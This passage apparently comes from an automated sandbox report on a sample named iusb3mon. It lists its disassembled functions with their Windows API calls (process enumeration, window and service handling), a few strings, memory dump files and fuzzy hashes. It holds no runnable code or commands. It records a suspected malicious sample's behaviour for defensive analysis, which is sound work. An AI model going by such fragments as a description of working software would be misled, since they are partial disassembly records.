Opcode ID: da114462fccf7f74122a36ef21a2807be7d3add1dbf1c5e7d17a0babfd118a4b
Instruction ID: d0215c7954e80075f068c2520d108a27a1f7b06cedf39f3f7ff02cecb15860a6
Opcode Fuzzy Hash: da114462fccf7f74122a36ef21a2807be7d3add1dbf1c5e7d17a0babfd118a4b
Instruction Fuzzy Hash: 62311331924316AFEFA21B60DC4CBAA7FA6DF51B20F1C0599FD04662C1CBF44981DBA1

Function 062ABF72 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 062AC0EA: GetParent.USER32(?), ref: 062AC11D
Part of subcall function 062AC0EA: GetLastActivePopup.USER32(?), ref: 062AC12C
Part of subcall function 062AC0EA: IsWindowEnabled.USER32(?), ref: 062AC141
Part of subcall function 062AC0EA: EnableWindow.USER32(?,00000000), ref: 062AC154

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 062ABFA8
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 062AC016
MessageBoxA.USER32(00000000,?,?,00000000), ref: 062AC024
EnableWindow.USER32(00000000,00000001), ref: 062AC040

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: 8509e40ee8d51e8248f8a77f28e0e66c8c82365a12910dae2a5e5d2c732e7dde
Instruction ID: 8e7dcf5b637ccc262150ffa739b3d10d6d76cc24177d2009586e01da1a9633ca
Opcode Fuzzy Hash: 8509e40ee8d51e8248f8a77f28e0e66c8c82365a12910dae2a5e5d2c732e7dde
Instruction Fuzzy Hash: 61219176E2030AAFDB609FA5CCC5AEDB7B9EB04351F18046AFE51E2240C7B19940CF50

Function 062A33E5 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0629EA70,00000001,00000000,?,?,?,?,?,?,0629EA70,?,0000000C), ref: 062A3414
MultiByteToWideChar.KERNEL32(0629EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3427
MultiByteToWideChar.KERNEL32(0629EA70,00000001,0000000C,?,?,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A348B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 0f4942186cc60df2bf1eb57ffd70201eec61fa48c21e7c39af909e2a2b64b855
Instruction ID: 9e0b84bccb4f74e4a19be4f9ebf191c91082f14a3875d2c42c91884994a24a52
Opcode Fuzzy Hash: 0f4942186cc60df2bf1eb57ffd70201eec61fa48c21e7c39af909e2a2b64b855
Instruction Fuzzy Hash: 2A210732D1021AEBCF228F84DC499DEBFB6FF49360F154129FA15A2160C3729961DBA0

Function 0629827E Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,?,?,06297ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062982BA
VirtualFree.KERNEL32(?,00000000,00008000,?,?,06297ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 062982DE
GetProcessHeap.KERNEL32(00000000,?,?,?,06297ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062982E6
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062982ED

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$Heap$LibraryProcessVirtual
String ID:
API String ID: 548792435-0
Opcode ID: 6286b738afe2800c8a7f62ad10140bbd601938703c3f6182212aeeb5381930a6
Instruction ID: 26640c29823d86891b3f18cfcc2dead4a675e1117b655af3bea34e65cd18d326
Opcode Fuzzy Hash: 6286b738afe2800c8a7f62ad10140bbd601938703c3f6182212aeeb5381930a6
Instruction Fuzzy Hash: 3D012172910B529FDB609FA4DCC882B77E9FF852213194D2DFAA693950C774A841CF60

Function 062AA750 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 062AA75B
GetTopWindow.USER32(00000000), ref: 062AA76E
GetTopWindow.USER32(?), ref: 062AA79E
GetWindow.USER32(00000000,00000002), ref: 062AA7B9

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: bba35440ccad16ce77dbe677f85b80a09b723fea00062c197b1d3993eedaf1aa
Instruction ID: a0ddae1a2f7989c21a8efd2cee57fa89efae81858c47bb405cd9235aaaedd01d
Opcode Fuzzy Hash: bba35440ccad16ce77dbe677f85b80a09b723fea00062c197b1d3993eedaf1aa
Instruction Fuzzy Hash: 4A014B36921727ABAFE22E619C04EAF7B79AF45B50F054021FE1099118DBF1C912DAE1

Function 062AA7C9 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 062AA7D7
SendMessageA.USER32(00000000,?,?,?), ref: 062AA80D
GetTopWindow.USER32(00000000), ref: 062AA81A
GetWindow.USER32(00000000,00000002), ref: 062AA838

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 4b815eaf49e9f6e2c820ffa15ee8d6c46381d5ce8e89cbbdc082d2332769d841
Instruction ID: 12a68eac743318d53967b40ffafd3fcaba898d2e566e884eadf5c7536f0f50f5
Opcode Fuzzy Hash: 4b815eaf49e9f6e2c820ffa15ee8d6c46381d5ce8e89cbbdc082d2332769d841
Instruction Fuzzy Hash: DA01E93242035ABFDF925E91EC08EDF3A6AEF45790F058020FE1055060C7B6C666EFA1

Function 062A8C3E Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 062A8C66
GetFocus.USER32 ref: 062A8C79
GetParent.USER32(?), ref: 062A8C87
GetNextDlgTabItem.USER32(?,?,00000000), ref: 062A8CA3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 204430d6ddf3eaf8336bc8850adf5b9872d1947eded2ab024578a8b2ad84a611
Instruction ID: beaf7f33dcf5ee5362cc4afcab7af1778b34e0aae13351aff05fa2a62e3f1108
Opcode Fuzzy Hash: 204430d6ddf3eaf8336bc8850adf5b9872d1947eded2ab024578a8b2ad84a611
Instruction Fuzzy Hash: 461130719207019FDB789F60E858B6A77A6AF40711F114A2CFA92465E0CBF4E885CF50

Function 062AAD58 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 062AAD96
SetBkColor.GDI32(00000000,00000000), ref: 062AADA2
GetSysColor.USER32(00000008), ref: 062AADB2
SetTextColor.GDI32(00000000,?), ref: 062AADBC

Part of subcall function 062AB81C: GetWindowLongA.USER32(00000000,000000F0), ref: 062AB82D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 77c8c677f6e1127cb0c4e4a50a63b7c2e12add784652a2a3a34b8c8e7c8154c9
Instruction ID: b8db18e86cce47a44303635713f5862d8ca3bfb43f703609a4937f75c0790740
Opcode Fuzzy Hash: 77c8c677f6e1127cb0c4e4a50a63b7c2e12add784652a2a3a34b8c8e7c8154c9
Instruction Fuzzy Hash: FA016930920B0AABEFA15E74EC49BAE3B75EF00342F504511FE82D50E0CBF0C8A5DA61

Function 062A65EF Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(062C88B8,00000001), ref: 062A6617
InitializeCriticalSection.KERNEL32(062C88A0,?,?,?,062A495C), ref: 062A6622
EnterCriticalSection.KERNEL32(062C88A0,?,?,?,062A495C), ref: 062A6661

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: aee528de5f52916c363a87e7f36686585fcdd81224b00a39d706eac1f295b43a
Instruction ID: 6982c1ab9e9b64e3693b7aa8dd226735a57bf682ad3121087f72b0097bcb873c
Opcode Fuzzy Hash: aee528de5f52916c363a87e7f36686585fcdd81224b00a39d706eac1f295b43a
Instruction Fuzzy Hash: 63F08C70BB43269BE7D54A14BD8DE753EA6E7C0BF1B184226EF4181A40D7FD84818E10

Function 06298D94 Relevance: 6.0, APIs: 4, Instructions: 42processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,76228A60,062C2BE8,062B7FD0,06297609,062B7FD0,?,?,?), ref: 06298D9B
Process32First.KERNEL32(00000000,00000000), ref: 06298DB4
Process32Next.KERNEL32(00000000,00000000), ref: 06298DD0
lstrcmpiA.KERNEL32(00000024,062C2BE8), ref: 06298DDE

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 2530627638-0
Opcode ID: 9146f4d7f1d0956ea22c4f7dfb5b94bd20bce2c4c045170e755dae7df90a8722
Instruction ID: e316615a494c981282c221c08c9859ba5ad57203378d86c182e1df7e82ede74c
Opcode Fuzzy Hash: 9146f4d7f1d0956ea22c4f7dfb5b94bd20bce2c4c045170e755dae7df90a8722
Instruction Fuzzy Hash: 82F0B4322243126BEBE06A769C44E7B6ADCEFD6760F080C5EFD58D5140DB94D8129275

Function 06291BFF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06291C0F
Process32First.KERNEL32(00000000,?), ref: 06291C28
Process32Next.KERNEL32(00000000,00000128), ref: 06291C43
CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?,00000002,00000000), ref: 06291C68

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f925bfb5d769c6d6f1685ca3c2e29988dc37c215a81742d7d96822b43ba88511
Instruction ID: 6ab25ee81b4bbfd5d09163a77447edfa5f38a9a14c60d91f42b1cf1a8d964f68
Opcode Fuzzy Hash: f925bfb5d769c6d6f1685ca3c2e29988dc37c215a81742d7d96822b43ba88511
Instruction Fuzzy Hash: F2F0687151130A5BDF90AA559C84EEA72BCDB88354F000075AD44D1180DFB4C9658A31

Function 062AB8DB Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 062AB8E8
GetWindowTextA.USER32(?,?,00000100), ref: 062AB904
lstrcmpA.KERNEL32(?,?), ref: 062AB918
SetWindowTextA.USER32(?,?), ref: 062AB928

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 860f8e0fd9f1ccf988087d7470855675374b964d94d8c94fff85f73f7286199e
Instruction ID: dbeded134dfd35883fb3c0c56928a262cb49bd0d19f551c62731ba30e53cf9da
Opcode Fuzzy Hash: 860f8e0fd9f1ccf988087d7470855675374b964d94d8c94fff85f73f7286199e
Instruction Fuzzy Hash: DDF0FE3580021AABDF225F64ED08AE9BB6EEB18391F01C021FD85D1110D7B0D995DF90

Function 06293D3B Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 06293D53

Strings

Remarkbeizhu, xrefs: 06293D41
Groupfenzhu, xrefs: 06293D48, 06293D61
Console, xrefs: 06293D62

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: strlen
String ID: Console$Groupfenzhu$Remarkbeizhu
API String ID: 39653677-274741502
Opcode ID: 9fe6169b1a2f436fe2a4f314879a4c8de5d786dc055e1bb08d543891ab0490f6
Instruction ID: 275093ccce525278b0b9c89a21a2a75dfb45f2b5692adb5b681a6568942738ba
Opcode Fuzzy Hash: 9fe6169b1a2f436fe2a4f314879a4c8de5d786dc055e1bb08d543891ab0490f6
Instruction Fuzzy Hash: 6DD0C232820210BADA905A04AC0DBE63655EB80770F18444CBD18250D0C6B248C08BB1

Function 0629703A Relevance: 6.0, APIs: 4, Instructions: 17servicesleepregistryCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,06297029), ref: 06297048
CloseServiceHandle.ADVAPI32(?,06297029), ref: 0629705C
RegCloseKey.ADVAPI32(?,06297029), ref: 06297070
Sleep.KERNEL32(000001F4,06297029), ref: 0629707B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$HandleService$Sleep
String ID:
API String ID: 994006413-0
Opcode ID: 9d83578863cb6db02e85c8a6fc1e23e46bfcf7cce25c4d227dd97e3f2a39980b
Instruction ID: 09174c592dd914b7df7820aab284878ed290b587fc3242c22cb9264264a9f98d
Opcode Fuzzy Hash: 9d83578863cb6db02e85c8a6fc1e23e46bfcf7cce25c4d227dd97e3f2a39980b
Instruction Fuzzy Hash: 5AE07531920216DBDFB26FA0ED4D65DBA76AB40701F4540F8EA4D640608A711AC5EE20

Function 06291606 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0629160B

Strings

bad Allocate, xrefs: 062917C9
bad buffer, xrefs: 062916C5

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: bad Allocate$bad buffer
API String ID: 3519838083-2913219628
Opcode ID: 26a2ed7453d367fefc3875ce2138e0ed4da59f61f7ea61e6dc77ba5908b5418b
Instruction ID: 8a4260cf1757f47eabe086f011ba4d7408d32ada7c52d875584fc4a7ecb5f9bf
Opcode Fuzzy Hash: 26a2ed7453d367fefc3875ce2138e0ed4da59f61f7ea61e6dc77ba5908b5418b
Instruction Fuzzy Hash: 7E51AA71E2020BABDFC5EFA5CC45AEEB7B9AF84750F044019ED15A7180DB309A64CBB1

Function 00341EA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0034202F

Part of subcall function 00346F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,003411FC,?,?,?,?,003411FC,?,0036A814), ref: 00346F94

Strings

ios_base::failbit set, xrefs: 00341EC8
ios_base::badbit set, xrefs: 00341FC7, 00341FF2, 00342013

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 9ee514cb3610558bf59c72121c888bb1fb5b7fd05298fe2a3f9f60c17dbf5226
Instruction ID: 9e1908fadc4454d989e82ce3da25185e7015572227d70c3cf2eb20f461558d69
Opcode Fuzzy Hash: 9ee514cb3610558bf59c72121c888bb1fb5b7fd05298fe2a3f9f60c17dbf5226
Instruction Fuzzy Hash: C051F7B5910608ABCB05DF98CC41AAAF7F8FF49310F14861AF9149B691E770B949CBA1

Function 0629E2C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

